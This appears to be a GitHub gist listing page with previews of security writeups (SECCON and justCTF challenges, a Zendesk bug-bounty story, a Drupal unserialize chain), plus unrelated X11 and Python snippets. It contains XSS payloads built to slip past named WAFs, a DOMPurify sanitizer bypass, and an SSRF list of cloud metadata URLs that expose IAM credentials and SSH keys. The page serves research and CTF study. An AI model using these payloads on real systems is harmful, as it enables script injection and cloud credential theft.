@parrot409
parrot409 / _writeup.md
Last active January 8, 2026 07:24
Impossible Leak - SECCON 2025 Quals

XS Leaks using disk cache grooming

The admin bot creates a new browsing context with createBrowsingContext() and uses that to create a page. Each browsing context should have a dedicated disk cache, but how does Chrome handle this? I deduced that it uses an in-memory disk cache, and it's much smaller than the default on-disk disk cache. The incognito tab of my browser has the same behavior.

The following page alerts "not cached" due to cache miss in incognito mode but no error happens in a regular tab.

$ head /dev/urandom -c 5242880 > chunk
$ cat <<EOF > index.html
@hackermondev
hackermondev / zendesk.md
Last active January 21, 2026 17:09
1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like support@company.com), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

@kevin-mizu
kevin-mizu / app.js
Created July 15, 2024 16:48
DOMPurify bypass using ISO-2022-JP
const createDOMPurify = require("dompurify");
const { JSDOM } = require("jsdom");
const http = require("http");
const server = http.createServer((req, res) => {
const window = new JSDOM("").window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);
res.statusCode = 200;
@terjanq
terjanq / README.md
Last active October 26, 2025 03:03
Another Another CSP | justCTF 2024 | writeup

Another Another CSP by @terjanq


Background

This year I created a copycat challenge of another-csp from DiceCTF Quals 2024. It was only solved by 1 team, DiceGang. Although the challenge looked almost identical, the solutions should be strictly different.

The intended solution of the original challenge was to leak one bit of information per admin visit based on crashing the browser renderer process with malicious CSS. (The below snippet was crashing the browser, but currently it's fixed)

@sorny
sorny / x11_forwarding_macos_docker.md
Last active January 15, 2026 16:25
X11 forwarding with macOS and Docker

X11 forwarding on macOS and docker

A quick guide on how to set up X11 forwarding on macOS when using Docker containers that require a DISPLAY. Works on both Intel and M1 Macs!

This guide was tested on:

  • macOS Catalina 10.15.4
  • docker desktop 2.2.0.5 (43884) - stable release
  • XQuartz 2.7.11 (xorg-server 1.18.4)
  • Macbook Pro (Intel)
@MineRobber9000
MineRobber9000 / README.md
Last active April 27, 2025 19:58
A small script that prints function signatures based on ast.FunctionDef objects. Handles hint typing and defaults.

print_funcdefs.py

A small script that prints function signatures based on ast.FunctionDef objects. Handles hint typing and defaults.

Usage:

$ python print_funcdefs.py -h
usage: print_funcdefs.py [-h] [-v] file

Prints function signatures from a file (based on the AST representation).
@zetc0de
zetc0de / xss-bypass-waf
Last active January 9, 2024 09:20
XSS Bypass WAF
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>
@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
DotDefender WAF bypass by @0xInfection
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme
@paul-axe
paul-axe / insomnihack2019teaser_droops_writeup.md
Created January 20, 2019 12:42
insomnihack2019teaser_droops_writeup.md

The challenge was based on Drupal 7 with an obvious unserialize call added.

Trying to build a chain, the first solution I found was based on the following chain:

./includes/bootstrap.inc

abstract class DrupalCacheArray
    ...
    public function __destruct() {
        $data = array();
@jhaddix
jhaddix / cloud_metadata.txt
Last active January 22, 2026 16:38 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key